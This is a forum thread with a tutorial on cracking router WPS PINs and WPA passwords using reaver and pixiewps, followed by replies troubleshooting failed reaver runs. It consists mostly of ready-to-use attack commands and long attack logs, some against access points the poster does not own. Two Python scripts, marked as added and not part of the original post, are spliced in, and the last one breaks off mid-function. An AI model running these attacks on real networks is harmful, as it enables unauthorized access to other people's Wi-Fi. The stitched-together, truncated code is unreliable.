EvilZone
Hacking and Security => High Quality Tutorials => : iTpHo3NiX May 06, 2015, 05:15:52 AM
-
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///// Title: Wireless Auditing with Kali Linux - aircrack-ng, reaver, and pixiewps /////
///// Paper by: iTpHo3NiX /////
///// Date: 08.10.2015 /////
///// Rev: 1.0.2 /////
///// Source: Evilzone.org /////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Disclaimer
I, iTpHo3NiX, or EvilZone.ORG, do not condone the illicit activities of wireless auditing on unauthorized systems. We do however encourage you to use this knowledge to your benefit to learn and practice exploitation using the latest in Wireless Auditing. Although I did do a write up about using reaver and pixiewps, there have been updates, I have more tests, and more knowledge on the tools. Please keep in mind it is illegal to penetrate networks that are not your own without proper permission. This falls on you, so do what you will, but we will hold no liability for your actions.
Prerequisites
- Kali-Linux (32bit or 64bit)
- Active Internet Connection
- A Brain
Intro
Ok, to start, we are going to boot up Kali. The first steps are to upgrade aircrack-ng 1.2RC, reaver fork 1.5.2, as well as pixiewps 1.1. With Kali this is very simple; after the Kali instructions I will include how to compile from source for reaver fork and pixiewps. There are several people to thank for this project, so I will just say: thank you to the creators of Kali Linux, the creators of the aircrack suite, the creators of reaver (as well as the fork), and also the creator of pixiewps and the individual that discovered the pixiewps exploit. Furthermore, thank you EvilZone for existing :P I would also like to say I'm not going to go super in depth in the use of aircrack-ng. There is so much documentation and so many tutorials floating around that I feel it would be an overlooked section and too large to take care of; I will go over the relevant changes in the new version for our purposes.
Upgrading/Installing Aircrack-ng, reaver fork, and pixiewps
Kali Instructions:
apt-get update
apt-get dist-upgrade
Ok we're done.
Compiling forked reaver and pixiewps from source:
1. Install dependencies:
apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
2. Download the files:
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
wget https://github.com/wiire/pixiewps/archive/master.zip
3. Extract the downloads:
unzip reaver-wps-fork-t6x-master.zip
unzip pixiewps-master.zip
4. Cleanup the zip files:
rm -f reaver-wps-fork-t6x-master.zip
rm -f pixiewps-master.zip
5. Setup Reaver:
Change Directory to /reaver-wps-fork-t6x-master/src
chmod 777 configure
./configure
make
make install
6. Setup pixiewps:
Change Directory to /pixiewps-master/src
make
make install
Ok, so now we are set up with the latest and greatest. Even if they update the applications by the time you read this, the setup is still relevant as the download links will download the master fork from GitHub ;)
How to use aircrack-ng
So let's focus on the changes to airodump-ng as well as airmon-ng. We will focus on cracking the WPS pin, so what has the aircrack team done with airodump to locate WPS enabled routers? They added a --wps command!
An example command we can run with airodump-ng is as follows:
airodump-ng wlan0mon --wps
This will give us output like the following
(http://i.imgur.com/ceIAsbV.png?1)
So as you can see, airodump-ng can now display WPS routers. Now we do have another option, which is to use reaver (the wash command), but I will get to that later; we're talking about aircrack right now. If you notice in the image and command above, there is my wireless adapter with a new name :) airmon-ng now has a new way to handle monitor mode on your devices. Let's take a look at the command.
Example airmon-ng command:
airmon-ng start wlan0 -v
The example output is as follows (mine is wlan1):
root@kali:~# airmon-ng start wlan1 -v
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2505 NetworkManager
2610 wpa_supplicant
10481 dhclient
PHY Interface Driver Chipset
phy0 wlan1 rt2800pci Ralink corp. RT3090 Wireless 802.11n 1T/1R PCIe
Usage: iw [options] dev <devname> set channel <channel> [HT20|HT40+|HT40-]
Options:
--debug enable netlink debugging
(mac80211 monitor mode vif enabled for [phy0]wlan1 on [phy0]wlan1mon)
(mac80211 station mode vif disabled for [phy0]wlan1)
airmon-ng will also now kill processes that may interfere with monitor mode on your device. As shown above the new monitor mode interface is:
wlan1mon
We'll run iwconfig to confirm:
root@kali:~# iwconfig
wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
eth0 no wireless extensions.
lo no wireless extensions.
Ok so these changes to aircrack will help us with cracking some access points!
Using wash to find WPS enabled routers
Ok so our options for wash are as follows:
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help
Example:
wash -i mon0
Ok, so now I want to point out a new option, "-g". This option will attempt to get the chipset for the router as well. However, using this method will take extra time to display the routers. The command we will be using is as follows (with or without the -g option; however, if using the -g option a channel is required to be set):
wash -i wlan1mon -C
Our output is as follows
root@kali:~# wash -i wlan1mon -C
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
84:1B:5E:F8:21:62 1 -79 1.0 No NETGEAR10
44:32:C8:53:D1:A4 1 -85 1.0 No HOME-D1A4
08:86:3B:21:F3:1C 11 -81 1.0 No belkin.31c
66:EB:8C:3C:4A:31 11 -77 1.0 No DIRECT-8C3CCA31
00:1D:D6:9F:FF:F0 1 -83 1.0 No HOME-FFF2
6C:B0:CE:9F:DD:25 11 -75 1.0 No NETGEAR91
90:1A:CA:41:63:60 11 -81 1.0 No HOME-6362
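As an added example (not part of the original post), here is a small Python parser for the wash survey table above. It turns the rows into records and reports which APs advertise WPS with the locked flag clear, strongest signal first, which is the inventory a defender wants when deciding where to disable WPS. The sample rows are the ones from the output above; the column alignment and function names are my own.

```python
import re
from collections import Counter

# Sample input: the wash survey rows shown above (BSSID, channel, RSSI,
# WPS version, WPS locked, ESSID), with the tool banner and header included
# so the parser has to skip them.
WASH_OUTPUT = """\
Wash v1.5.1 WiFi Protected Setup Scan Tool

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------------------------------------------------
84:1B:5E:F8:21:62  1        -79   1.0          No          NETGEAR10
44:32:C8:53:D1:A4  1        -85   1.0          No          HOME-D1A4
08:86:3B:21:F3:1C  11       -81   1.0          No          belkin.31c
66:EB:8C:3C:4A:31  11       -77   1.0          No          DIRECT-8C3CCA31
00:1D:D6:9F:FF:F0  1        -83   1.0          No          HOME-FFF2
6C:B0:CE:9F:DD:25  11       -75   1.0          No          NETGEAR91
90:1A:CA:41:63:60  11       -81   1.0          No          HOME-6362
"""

# One data row: MAC, channel, RSSI (negative dBm), WPS version, Yes/No lock
# flag, then the ESSID, which may itself contain spaces.
ROW_RE = re.compile(
    r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(\d+)\s+(-?\d+)\s+(\S+)\s+(Yes|No)\s+(.*?)\s*$"
)


def parse_wash(text):
    """Return a list of dicts, one per AP row; banner/header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # banner, column header, separator, blank line
        bssid, channel, rssi, version, locked, essid = m.groups()
        rows.append({
            "bssid": bssid.upper(),
            "channel": int(channel),
            "rssi": int(rssi),
            "wps_version": version,
            "locked": locked == "Yes",
            "essid": essid,
        })
    return rows


def unlocked_wps(rows):
    """APs whose WPS registrar is not in the locked state, strongest signal first.
    'No' in the WPS Locked column means the AP is still accepting PIN attempts,
    so these are the ones to disable WPS on (or to confirm lockout behaviour for)."""
    return sorted((r for r in rows if not r["locked"]),
                  key=lambda r: r["rssi"], reverse=True)


def channel_histogram(rows):
    """Count WPS-enabled APs per channel (useful for a site survey report)."""
    return Counter(r["channel"] for r in rows)


def report(text):
    """Human-readable summary of a wash capture."""
    rows = parse_wash(text)
    exposed = unlocked_wps(rows)
    lines = [f"{len(rows)} WPS-enabled APs seen, {len(exposed)} not locked"]
    for r in exposed:
        lines.append(f"  {r['bssid']}  ch {r['channel']:>2}  {r['rssi']:>4} dBm  "
                     f"v{r['wps_version']}  {r['essid']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(WASH_OUTPUT))
```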
Now looking at this, I do seem to be fairly far from several targets, so it is going to be difficult to get the beacons and packets necessary to run reaver. So let's look at the usage for this reaver fork so we can go over some functions to use directly with pixiewps.
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
Example:
reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
So the command we're going to run is as follows
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -vvv -c #
Let's focus on the -K 1 and -P options:
-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
*Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)
-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
So with our new command, we no longer need to do a bunch of copy/pasting, and it will also make auto scripts much easier to code (pretty much makes AutoPixiewps.py obsolete). Please note you will be required to use the -c option when using the -K 1 or 2 arguments.
With the above code, everything is handled through reaver. However I'd like to make a point on how to manually run reaver and pixiewps separately.
Alternate reaver command is as follows
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vvv
With this command we will get information from the M1, M2, and M3 messages. This will include the PKE, PKR, E-Nonce, R-Nonce, eHash1, eHash2, and the AuthKey
So now let's focus on pixiewps.
Using pixiewps to get the WPS Pin
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
So our example command will be as follows
pixiewps -e PKE -r PKR -s eHash1 -z eHash2 -a AuthKey -n enonce -m rnonce -f -v 3
That's it. With a vulnerable router you will get your pin; then you can run the following reaver command to get the WPA key:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vv --pin=00000000
Reaver will now spit out the WPA password and you did it.
Conclusion
I'm not too happy with my previous post about cracking using pixiewps, as it didn't go more in depth with more options as far as cracking routers that are not Ralink, and it focused on using the -S argument. Plus, there have been several changes between aircrack-ng, reaver, and pixiewps. In the end, thanks for reading and good luck pentesting. If you choose to copy and paste this tutorial, please give credit where credit is due. Please keep the top portion and a linkback to this thread: https://evilzone.org/tutorials/wireless-auditing-with-kali-linux-aircrack-ng-reaver-and-pixiewps Thank you for reading and have fun exploiting!
-
Changelog
08.10.2015 - Rev 1.0.2
-Modified: Changed the reaver command to -vvv to show the output for use... They must've modified the build for reaver, running -vv will output like reaver 1.4
07.05.2015 - Rev 1.0.1
-Added: "Please note you will be required to use the -c option when using the -K 1 or 2 arguments."
-Added: -vv to the command for running reaver to get the pin as I forgot it.
-Removed: A random "(" after the Setup pixiewps section
Does someone want to format this for the WIKI? That'd be great, and much better formatting :P
-
Great tutorial! Didn't read till the end, on phone currently.
In the wash command, you used -C instead of -g
-
Great tutorial! Didn't read till the end, on phone currently.
In the wash command, you used -C instead of -g
I know -C is to ignore-fcs ;) I'm not close enough to a WPS access point atm to fully demonstrate as I'm at home and not wardriving, look at the RSSI, nothing under -75 and I don't feel like enabling WPS on my router... meh fuck it, maybe I will
Edit: my router updated to block pixie entirely; not getting the M2 or M3 message, so no ehashes.
-
great thread deep copy
-
Thanks for the incredibly informative tutorial. I had no idea there were so many updates.
-
Nice post, lots of great info.
-
I'm sorry for using your thread ;D but I can't properly run reaver; when I launch it, it always tells me something like this:
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
And it stops here!
I've tried a lot of APs, I've tried with the computer 20cm from the AP too, I've tried using another computer with another wlan card and a lot of options after the reaver command, but it won't run.
Can anybody tell me why it doesn't run? I usually type this command:
reaver -i mon0 -b Mac_address -S -L -vv
or
reaver -i mon0 -b Mac_address -vv -L -N -d 15 -T .5 -r 3:15
Thanks a lot to everybody who wants to help me! :)
-
Is your card capable of injection? I think it's aireplay-ng -9 to check.
Try running WASH to see if reaver will even work. http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH
-
Thanks for your reply white-knight!! ;)
Is your card capable of injection? I think it's aireplay-ng -9 to check.
"aireplay-ng -9 mon0" tells me:
Injection is working!
Found 4 APs
Try running WASH to see if reaver will even work. http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH
"wash -i mon0 -C -s" regularly scans the APs around me (all WPS 1.0 without WPS locking)
-
You're not associated with the AP. Let's make sure you have all of the proper files; let's build them all from scratch.
Install dependencies:
apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
Download reaver and pixie:
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
wget https://github.com/wiire/pixiewps/archive/master.zip
Extract them:
unzip reaver-wps-fork-t6x-master.zip
unzip pixiewps-master.zip
Cleanup archives:
rm -f reaver-wps-fork-t6x-master.zip
rm -f pixiewps-master.zip
Setup Reaver:
Change Directory to /reaver-wps-fork-t6x-master/src
chmod 777 configure
./configure
make
make install
Setup pixiewps:
Change Directory to /pixiewps-master/src
make
make install
Ok, now run everything. I'm sure you don't have the proper version of reaver.
-
Thanks a lot Deep... Something has changed because I don't see the failed to associate warnings, but it always stops here:
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
I wait a couple of minutes but nothing ever happens, and I need to stop it with ctrl+c; changing APs doesn't solve it.
Thanks for your support!
-
Thanks a lot for this tutorial. Very informative and straight forward. Gonna try this out later tonight.
-
Thanks a lot Deep... Something has changed because I don't see the failed to associate warnings, but it always stops here:
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
I wait a couple of minutes but nothing ever happens, and I need to stop it with ctrl+c; changing APs doesn't solve it.
Thanks for your support!
You're not using the right version of reaver... compile the modified reaver from source and run it. You're not using the reaver built for pixiewps
Run the following line and post the whole output, and don't ctrl+c for a few minutes. Pick an AP that's close:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vv
Be sure to copy the output from the command you ran to when you ctrl-c
-
You're not using the right version of reaver... compile the modified reaver from source and run it. You're not using the reaver built for pixiewps
I've compiled the "reaver-wps-fork-t6x-master" you suggested I use; I'll do it another time, showing you the exact commands I'm running.
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
unzip master.zip
cd reaver-wps-fork-t6x-master/src
chmod 777 configure
./configure
make
make install
No errors appeared doing it, just a warning telling me that the "r" variable is implemented but not used:
wpscrack.c: In function 'main':
wpscrack.c:30:33: warning: variable 'r' set but not used [-Wunused-but-set-variable]
Run the following line and post the whole output, and don't ctrl+c for a few minutes. Pick an AP that's close:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vv
Be sure to copy the output from the command you ran to when you ctrl-c
When I launch this command the version that appears is v1.5.2, and it always freezes on "sending identity response" and I need to ctrl+c after a few minutes:
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save.
-
Something different happens if I try to use reaver with a Vodafone AP, but it falls into a loop: (please note it's probably not close to me and I don't know where it is)
root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -c 01 -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Vodafone-300XXXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m34s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h1m15s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h1m41s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h2m13s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h2m36s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Nothing done, nothing to save.
I'm going crazy with this reaver... :'( thanks for your support!
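Added example, not part of the thread: a short Python triage of a reaver session log like the one posted above. It counts pin attempts, records the highest WPS message each attempt reached and the failure codes, and says whether the AP ever handed out M3; the tutorial notes that pixiewps needs the M1 to M3 material, so an AP that always NACKs or times out after M2 (as in this log) never exposes it, which is exactly what an auditor wants to confirm after patching a router. The sample lines are a constructed excerpt of the log above, and the diagnosis wording and function names are my own.

```python
import re
from collections import Counter

# Constructed excerpt of the reaver 1.5.2 output posted above (three pin
# attempts, each ending differently).
REAVER_LOG = """\
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Vodafone-300XXXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WARNING: 10 failed connections in a row
"""

# Ordered stages of one WPS registration attempt as reaver reports them.
STAGES = ["none", "identity", "M1", "M2", "M3", "M4", "M5", "M6", "M7"]
MSG_RE = re.compile(r"\[\+\] (?:Received|Sending) (M\d) message")
FAIL_RE = re.compile(r"WPS transaction failed \(code: (0x[0-9a-fA-F]+)\)")


def parse_reaver_log(text):
    """Summarise a reaver session: attempts, stage reached per attempt, failure codes."""
    summary = {
        "attempts": 0, "stages": [], "failure_codes": Counter(),
        "timeouts": 0, "assoc_failures": 0, "lockout_warnings": 0,
    }
    stage = 0
    for line in text.splitlines():
        if "Trying pin" in line:
            if summary["attempts"]:
                summary["stages"].append(STAGES[stage])  # close previous attempt
            summary["attempts"] += 1
            stage = 0
            continue
        if "identity response" in line:
            stage = max(stage, STAGES.index("identity"))
        m = MSG_RE.search(line)
        if m:
            stage = max(stage, STAGES.index(m.group(1)))
        m = FAIL_RE.search(line)
        if m:
            summary["failure_codes"][m.group(1).lower()] += 1
        if "Receive timeout occurred" in line:
            summary["timeouts"] += 1
        if "Failed to associate" in line:
            summary["assoc_failures"] += 1
        if "failed connections in a row" in line:
            summary["lockout_warnings"] += 1
    if summary["attempts"]:
        summary["stages"].append(STAGES[stage])  # close the last attempt
    return summary


def highest_stage(summary):
    """The furthest WPS message seen in any attempt ('none' if no attempt)."""
    if not summary["stages"]:
        return "none"
    return max(summary["stages"], key=STAGES.index)


def diagnose(summary):
    """Plain-language reading of where the exchange stops (my own wording)."""
    top = STAGES.index(highest_stage(summary))
    if top < STAGES.index("M1"):
        return "no M1 received: the AP never starts a WPS exchange (check association, channel, monitor interface)"
    if top < STAGES.index("M3"):
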